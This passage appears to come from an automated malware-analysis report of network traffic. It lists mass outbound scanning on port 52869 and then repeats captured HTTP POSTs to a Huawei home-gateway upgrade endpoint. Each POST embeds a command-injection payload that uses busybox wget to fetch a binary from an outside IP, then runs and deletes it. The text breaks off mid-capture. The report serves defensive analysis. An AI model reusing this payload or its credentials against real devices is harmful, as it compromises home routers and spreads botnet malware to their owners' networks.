Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.234.115.27:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.72.112.156:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.2.161.197:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.107.205.194:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.112.158.85:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.182.215.0:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.194.81.58:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.133.67.38:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.37.153.92:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.156.231.148:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.175.92.254:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.103.169.124:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.249.80.105:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.52.227.170:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.179.20.78:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.165.92.91:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.138.88.59:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.67.201.16:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.128.145.203:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.176.80.0:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.209.68.65:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.58.99.201:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.224.65.124:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.21.181.188:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.21.119.122:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.241.131.136:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.10.42.174:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.70.173.129:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.69.31.130:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.243.30.147:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.83.79.215:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.19.251.30:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.65.173.124:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.32.213.91:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.112.165.32:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.119.48.250:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.62.158.119:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.110.21.158:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.241.21.244:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.156.206.33:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.203.17.236:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.33.59.81:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.55.133.26:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.203.221.144:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.249.141.77:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.68.37.137:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.75.4.211:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.135.164.98:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.60.186.215:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.241.218.242:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.126.66.130:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.192.18.184:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.2.111.47:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.95.181.125:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.233.166.181:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.10.95.109:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.231.132.204:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.115.245.58:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.208.58.31:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.153.24.57:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.218.181.81:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.12.99.51:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.142.12.114:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.224.170.191:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.191.201.196:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.227.183.202:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.142.181.246:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.206.244.205:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.254.30.122:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.67.111.155:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.189.156.198:52869 |
Source: global traffic | TCP traffic: 192.168.2.13:19073 -> 84.86.254.84:52869 |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 